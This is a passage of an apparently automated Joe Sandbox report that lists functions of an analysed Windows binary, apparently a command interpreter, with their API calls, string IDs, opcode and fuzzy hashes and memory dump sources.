                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: Heap$AllocProcesslongjmp$iswdigitiswspacewcschr
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: GeToken: (%x) '%s'
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 3282654869-1994581435
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 69c34943887ae9b74dbb8ac009ab6e722a6e47999aa419ff77bc8c62eb614955
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 5059c1fba0227f120052b6cd311d78ae5f72a927f9049e259bf49aac194e3b19
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 69c34943887ae9b74dbb8ac009ab6e722a6e47999aa419ff77bc8c62eb614955
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D461F261A4924B82FB16AB21E45417DF2A0EF457A4FD64536CA1F076F1EEBCE4908330
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D15410D8 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 180COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D151CD90: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7D151B9A1,?,?,?,?,00007FF7D151D81A), ref: 00007FF7D151CDA6
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D151CD90: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7D151B9A1,?,?,?,?,00007FF7D151D81A), ref: 00007FF7D151CDBD
                                                                                                                                                                                                                                                                                                                                                                                                                                        • wcschr.MSVCRT(?,00000000,00000000,00000000,00000001,0000000A,?,00007FF7D153827A), ref: 00007FF7D15411DC
                                                                                                                                                                                                                                                                                                                                                                                                                                        • memmove.MSVCRT(?,00000000,00000000,00000000,00000001,0000000A,?,00007FF7D153827A), ref: 00007FF7D1541277
                                                                                                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: Heap$AllocProcessmemmovewcschr
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: &()[]{}^=;!%'+,`~
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 1135967885-381716982
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 889ed0e1ac931929da6aa725351c410d7e283b9244a42ae2ffb62b95a24414b6
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: e1e9d46e19e9bf8282fbfd5d12f8d365a368bdddc53c8b1734b3ab198b170db2
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 889ed0e1ac931929da6aa725351c410d7e283b9244a42ae2ffb62b95a24414b6
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: CD7182B1A0824B86F760AF15E48067DE6A4FB94799FD04237D94F83BB4DABCF4418B10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D15408EC Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 132COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: memmovewcsncmp
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: 0123456789
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 3879766669-2793719750
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: b6d2eb98a78dae28402b6106fc772dbd77ca9a03dc6c88e297d1125e4b884182
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 3edad88cfa28272fe43b3f889c524b94ec4ba92d8d437a683771ea9ecb1dce23
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b6d2eb98a78dae28402b6106fc772dbd77ca9a03dc6c88e297d1125e4b884182
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E2419322B1868B85FB65AF66D4006BEA394FB44B90FE45232DE4F477A4DFBCD4418390
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D1539784 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100registryCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF7D15397D0
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D151D3F0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF7D151D46E
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D151D3F0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF7D151D485
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D151D3F0: wcschr.MSVCRT ref: 00007FF7D151D4EE
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D151D3F0: iswspace.MSVCRT ref: 00007FF7D151D54D
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D151D3F0: wcschr.MSVCRT ref: 00007FF7D151D569
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D151D3F0: wcschr.MSVCRT ref: 00007FF7D151D58C
                                                                                                                                                                                                                                                                                                                                                                                                                                        • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF7D15398D7
                                                                                                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: wcschr$Heap$AllocCloseOpenProcessiswspace
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: Software\Classes
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 2714550308-1656466771
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: eb7f4015b54f8209f821cd25b29d275aeb821b067b2f4fde3e660eb3c9d82795
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: b0562e9ac648af71202441ef8e5576418d37bdfce953df32fadee897000995ca
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: eb7f4015b54f8209f821cd25b29d275aeb821b067b2f4fde3e660eb3c9d82795
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5B416A66A0965BC1FB00AB16945402DE3A5EB85BD0BD08132DA5E477B1DFBDD886C360
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D153A0B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 98registryCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF7D153A0FC
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D151D3F0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF7D151D46E
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D151D3F0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF7D151D485
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D151D3F0: wcschr.MSVCRT ref: 00007FF7D151D4EE
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D151D3F0: iswspace.MSVCRT ref: 00007FF7D151D54D
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D151D3F0: wcschr.MSVCRT ref: 00007FF7D151D569
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D151D3F0: wcschr.MSVCRT ref: 00007FF7D151D58C
                                                                                                                                                                                                                                                                                                                                                                                                                                        • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF7D153A1FB
                                                                                                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: wcschr$Heap$AllocCloseOpenProcessiswspace
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: Software\Classes
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 2714550308-1656466771
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 8d4a83688f0bdb6c4652951bc114003fef2692198ab2fb548b80d57547a1bced
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 3011530ce47721473fb61fad1b1210c2cf15cc795ca79edca3f370c85344d252
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8d4a83688f0bdb6c4652951bc114003fef2692198ab2fb548b80d57547a1bced
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 63415C22A19B5B81FB41BB16D44442DB3A5EB847D0BD08132DA5F837B1DFBED896C360
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D151CAD4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 83COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: ConsoleTitle
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: -
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 3358957663-3695764949
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 6064907e277deedeb5a502c31a0978855624e0bf0fd413fe06aa3058ee5bb337
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: c360db95d29a2a970590f15769e2f1838fb5789d035dd07cb8545eaec306f515
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6064907e277deedeb5a502c31a0978855624e0bf0fd413fe06aa3058ee5bb337
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 87317C22A0864B82FB05BB11A85407CFAA4BF49B90FD94136D90F477B6DFBCE491C764
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D1527280 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 74COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: _wcsnicmpswscanf
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: :EOF
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 1534968528-551370653
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 0653d2a24574df907a156a73786289bc793a3e356bc39756bce3d9cad3207eea
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 06d588baf97c95816b9c3c9e0cb62b0109f1a301a2bf34a38e374ceb7c50fda5
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0653d2a24574df907a156a73786289bc793a3e356bc39756bce3d9cad3207eea
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A6318232A18A4B86FB54BB15E4502BDF2A0EF65B50FD44173EA4F462B1DFBCE841C660
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D1513BE4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: _wcsnicmp
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: /-Y
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 1886669725-4274875248
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 772bd3782c46842c372c8b89a915565f11f80ecece3792b3c4e3ce842e7c51e5
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 3893585e4d0a1b48d1cb6eabc9df3c9812b71e93b13c7196be9d435b080bddd7
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 772bd3782c46842c372c8b89a915565f11f80ecece3792b3c4e3ce842e7c51e5
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2A218065A08A5B81FB51AB03D45017CF6A1BF44FD4FD58032DE8A077A0DEBCE892D324
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D151B62C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 38COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: 3$3
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 0-2538865259
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: b8f86acd81ff1c6da407d28336be8d8a1ddaaa1636690dcce93971c28c339212
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 122d892b21f573a8c6b488a48e8ba572b5eb6560838035a42d71521a0751c07d
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b8f86acd81ff1c6da407d28336be8d8a1ddaaa1636690dcce93971c28c339212
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 62011231D2E68B8AF716BB60E8A42BCB670BB51321FD50537E41B015B1CFECA484C670
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D15206C0 Relevance: 5.1, APIs: 4, Instructions: 97memoryCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7D151B4DB), ref: 00007FF7D15206D6
                                                                                                                                                                                                                                                                                                                                                                                                                                        • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7D151B4DB), ref: 00007FF7D15206F0
                                                                                                                                                                                                                                                                                                                                                                                                                                        • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7D151B4DB), ref: 00007FF7D152074D
                                                                                                                                                                                                                                                                                                                                                                                                                                        • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7D151B4DB), ref: 00007FF7D1520762
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: Heap$AllocProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 1617791916-0
